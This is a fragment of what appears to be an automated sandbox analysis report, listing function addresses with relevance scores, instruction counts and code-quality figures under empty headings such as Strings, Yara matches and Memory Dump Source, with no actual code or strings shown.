Function 004742C0, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
C-Code - Quality: 79% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00460170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 00472230, Relevance: 2.8, Strings: 2, Instructions: 259COMMON
C-Code - Quality: 58% |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00471FC0, Relevance: 1.4, Strings: 1, Instructions: 175COMMON
C-Code - Quality: 61% |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00471FD8, Relevance: .0, Instructions: 25COMMON
C-Code - Quality: 61% |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00460010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
Strings |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004606F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004608F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |